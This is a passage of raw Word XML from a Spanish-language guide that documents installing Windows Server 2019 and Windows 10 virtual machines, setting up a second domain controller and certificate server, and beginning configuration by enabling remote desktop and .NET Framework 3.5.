          <w:p w14:paraId="18CB3E58" w14:textId="53D25887" w:rsidR="002D48C8" w:rsidRDefault="002D48C8" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E1C9645" w14:textId="5FC796D6" w:rsidR="00D25CEE" w:rsidRDefault="00723514" w:rsidP="00723514">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Idioma del sistema:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C3C5B22" w14:textId="77777777" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="47DB8035" w14:textId="2DBE60FF" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B9BD892" wp14:editId="24D05340">
                  <wp:extent cx="5400040" cy="4050030"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="615638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8286" name=""/>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6F51184" w14:textId="77777777" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6D6DBB3F" w14:textId="77777777" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3AA15F30" w14:textId="6C976A87" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00723514">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Versión:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0654141E" w14:textId="40CA7D7C" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00723514">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="333CCD8C" wp14:editId="3EA642FC">
                  <wp:extent cx="5400040" cy="4050030"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="132910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06260"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004FE2B" w14:textId="77777777" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00723514">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="267B889F" w14:textId="41FDCE2D" w:rsidR="00723514" w:rsidRDefault="00C6028D" w:rsidP="00723514">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="2"/>
              </w:numPr>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Contraseña</w:t>
            </w:r>
            <w:r w:rsidR="00723514">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05B666E3" w14:textId="77777777" w:rsidR="00723514" w:rsidRDefault="00723514" w:rsidP="00723514">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64912D2B" w14:textId="44CA4201" w:rsidR="00723514" w:rsidRDefault="00C6028D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E53078B" wp14:editId="7255178A">
                  <wp:extent cx="5400040" cy="4050030"/>
                  <wp:effectExtent l="0" t="0" r="0" b="7620"/>
                  <wp:docPr id="677060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60725" name=""/>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A6F0ECD" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AD3B2EB" w14:textId="714F93A1" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>La contraseña será ‘abc123.’ .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DCFE9C5" w14:textId="77777777" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="46364967" w14:textId="7470971C" w:rsidR="00C6028D" w:rsidRDefault="00C6028D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Con esto concluiriamos la in</w:t>
            </w:r>
            <w:r w:rsidR="008248B2">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>talación de la máquina de Windows server 2019.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48DDA495" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44CE8834" w14:textId="424C05C3" w:rsidR="002A269D" w:rsidRDefault="00D653C0" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="2" w:name="_Toc135575960"/>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Windows 10 20H2</w:t>
            </w:r>
            <w:bookmarkEnd w:id="2"/>
          </w:p>
          <w:p w14:paraId="4DEBFBD8" w14:textId="77777777" w:rsidR="002A269D" w:rsidRPr="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="1B037066" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahora procederé con la instalación de la máquina virtual de Windows 10:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6DFBB30C" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6C10C3D3" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Lo primero que haré es enseñar la configuración de la máquina:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5AD205DD" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="67310B04" w14:textId="69B24EDF" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7888BE10" wp14:editId="30F07216">
                  <wp:extent cx="5400040" cy="4170680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="47904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43472"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p>
          <w:p w14:paraId="00346067" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="481E9460" w14:textId="18916577" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CEE39DC" wp14:editId="7A2E662A">
                  <wp:extent cx="5400040" cy="4170680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="57918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2200"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p>
          <w:p w14:paraId="2DC5D113" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="22294572" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="2AD71A26" w14:textId="7489E3FA" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68FBF118" wp14:editId="51B10E87">
                  <wp:extent cx="5400040" cy="3069203"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1344626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6943" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId16">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="5403026" cy="3070900"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="40C12F8A" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="5CCEB638" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="62225546" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D"/>
          <w:p w14:paraId="762695F6" w14:textId="79C69228" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E1F673" wp14:editId="64B88599">
                  <wp:extent cx="5400040" cy="4170680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="47211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13579"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p>
          <w:p w14:paraId="74EEC0B4" w14:textId="77777777" w:rsidR="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="45F2533F" w14:textId="7C708115" w:rsidR="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="031503BC" wp14:editId="583CF593">
                  <wp:extent cx="5400040" cy="4170680"/>
                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                  <wp:docPr id="1747068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68498"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p>
          <w:p w14:paraId="2F5A64AA" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2AD0110E" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="39834EE9" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00472A8A">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:t>Ahor</w:t>
            </w:r>
            <w:r w:rsidRPr="002A269D">
              <w:rPr>
                <w:rStyle w:val="Carcterdecontenido"/>
              </w:rPr>
              <w:t>a procederé con la instalación:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="311B3022" w14:textId="77777777" w:rsidR="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="10A303BD" w14:textId="72903A27" w:rsidR="002A269D" w:rsidRDefault="002A269D" w:rsidP="002A269D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
            </w:pPr>
            <w:r>
              <w:t>Versión de Windows:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FEC46DB" w14:textId="77777777" w:rsidR="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="00FA352B">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:ind w:left="720"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4BF08150" w14:textId="4CFE13AB" w:rsidR="008B42B0" w:rsidRPr="002A269D" w:rsidRDefault="00A07F87" w:rsidP="00A07F87">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="220F91FE" wp14:editId="4A60710C">
                  <wp:extent cx="4628571" cy="2971429"/>
                  <wp:effectExtent l="0" t="0" r="635" b="635"/>
                  <wp:docPr id="1631829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9702" name=""/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId17">
                            <a:extLst>
                              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                              </a:ext>
                            </a:extLst>
                          </a:blip>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4628571" cy="2971429"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A269D" w14:paraId="50EB425D" w14:textId="77777777" w:rsidTr="00994D80">
        <w:trPr>
          <w:trHeight w:val="3546"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10426" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F6509FF" w14:textId="77777777" w:rsidR="002A269D" w:rsidRDefault="00C97C91" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>La contraseña y el usuario de este sistema operativo será Alesander y de contraseña ‘abc123.’ .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57CDDD9E" w14:textId="77777777" w:rsidR="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="408284BB" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:bookmarkStart w:id="3" w:name="_Toc135214875" w:displacedByCustomXml="next"/>
          <w:bookmarkStart w:id="4" w:name="_Toc135575961" w:displacedByCustomXml="next"/>
          <w:sdt>
            <w:sdtPr>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
                <w:noProof/>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:id w:val="1990516037"/>
              <w:placeholder>
                <w:docPart w:val="58E9F679AAB646E6BD7C72D21FBBBC7B"/>
              </w:placeholder>
              <w15:appearance w15:val="hidden"/>
            </w:sdtPr>
            <w:sdtContent>
              <w:p w14:paraId="200CABDA" w14:textId="77777777" w:rsidR="00A673FE" w:rsidRDefault="00A673FE" w:rsidP="00A673FE">
                <w:pPr>
                  <w:pStyle w:val="Ttulo2"/>
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                </w:pPr>
                <w:r>
                  <w:rPr>
                    <w:noProof/>
                  </w:rPr>
                  <w:t>Windows server 2019 v1809 Build 17763.737 dos:</w:t>
                </w:r>
                <w:bookmarkEnd w:id="4"/>
                <w:bookmarkEnd w:id="3"/>
              </w:p>
              <w:p w14:paraId="212980D2" w14:textId="77777777" w:rsidR="00A673FE" w:rsidRDefault="00A673FE" w:rsidP="00A673FE"/>
              <w:p w14:paraId="503FBBB9" w14:textId="77777777" w:rsidR="00A673FE" w:rsidRDefault="00A673FE" w:rsidP="00A673FE">
                <w:r>
                  <w:t>Esta máquina será el segundo controlador de dominio, funcionará como un controlador de dominio secundario y servidor de certificados.</w:t>
                </w:r>
              </w:p>
              <w:p w14:paraId="38119454" w14:textId="77777777" w:rsidR="00A673FE" w:rsidRPr="00F12593" w:rsidRDefault="00000000" w:rsidP="00A673FE"/>
            </w:sdtContent>
          </w:sdt>
          <w:p w14:paraId="1574387B" w14:textId="77777777" w:rsidR="00A673FE" w:rsidRDefault="00A673FE" w:rsidP="00A673FE">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>La instalación será igual que el otro controlador de dominio por la tanto la voy omitir, las configuraciones serán las mismas, la IP de esta máquina será 192.168.1.80.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="098F3325" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6FE659D7" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F08B3D3" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="51A18AFE" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E84895E" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="183DEF84" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5C145A10" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2BAFE2C1" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="70A2AFEA" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="38D48AD1" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="03917576" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="745C4C18" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18E2AFEF" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A1C217E" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1DF19B72" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="67457DD6" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4CA1791E" w14:textId="77777777" w:rsidR="00472A8A" w:rsidRDefault="00472A8A" w:rsidP="00CC3887">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="4ADFE749" w14:textId="77777777" w:rsidR="00A673FE" w:rsidRPr="00A673FE" w:rsidRDefault="00A673FE" w:rsidP="00A673FE"/>
          <w:p w14:paraId="5DC6C359" w14:textId="311BBF65" w:rsidR="00FA352B" w:rsidRDefault="00507D29" w:rsidP="00FA352B">
            <w:pPr>
              <w:pStyle w:val="Ttulo1"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="5" w:name="_Toc135575962"/>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="00FA352B">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Configuraciones de las máquinas</w:t>
            </w:r>
            <w:bookmarkEnd w:id="5"/>
          </w:p>
          <w:p w14:paraId="347075D7" w14:textId="77777777" w:rsidR="00FA352B" w:rsidRPr="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="00FA352B"/>
          <w:p w14:paraId="40542484" w14:textId="77777777" w:rsidR="00FA352B" w:rsidRDefault="00FA352B" w:rsidP="00FA352B">
            <w:pPr>
              <w:pStyle w:val="Ttulo2"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>
              </w:numPr>
            </w:pPr>
            <w:bookmarkStart w:id="6" w:name="_Toc135575963"/>
            <w:r>
              <w:t>Configuración Windows 10:</w:t>
            </w:r>
            <w:bookmarkEnd w:id="6"/>
          </w:p>
          <w:p w14:paraId="7C4BE38F" w14:textId="77777777" w:rsidR="008B42B0" w:rsidRDefault="008B42B0" w:rsidP="008B42B0"/>
          <w:p w14:paraId="1C4FB85C" w14:textId="77777777" w:rsidR="008B42B0" w:rsidRDefault="008B42B0" w:rsidP="008B42B0">
            <w:r>
              <w:t>Lo primero que haré será habilitar el escritorio remoto:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39607052" w14:textId="77777777" w:rsidR="008B42B0" w:rsidRDefault="008B42B0" w:rsidP="008B42B0"/>
          <w:p w14:paraId="43C1DDE5" w14:textId="1360BFED" w:rsidR="008B42B0" w:rsidRDefault="008B42B0" w:rsidP="008B42B0">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="01AFAF7C" wp14:editId="4BEBC6FE">
                  <wp:extent cx="5400040" cy="5805170"/>
                  <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                  <wp:docPr id="140427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77262" name=""/>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39DAFD62" w14:textId="77777777" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="008B42B0"/>
          <w:p w14:paraId="31FE2986" w14:textId="36C67916" w:rsidR="00CB223D" w:rsidRDefault="00CB223D" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>Necesitaremos i</w:t>
            </w:r>
            <w:r w:rsidR="006A17E1">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>ns</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>talar .NET Framework 3.5:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57D47697" w14:textId="77777777" w:rsidR="00C91830" w:rsidRDefault="00C91830" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="18EF957D" w14:textId="77777777" w:rsidR="00C91830" w:rsidRDefault="00C91830" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="44159A94" w14:textId="48D29EF3" w:rsidR="00C91830" w:rsidRDefault="00C91830" w:rsidP="00CB223D">
            <w:pPr>
              <w:pStyle w:val="Contenido"/>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
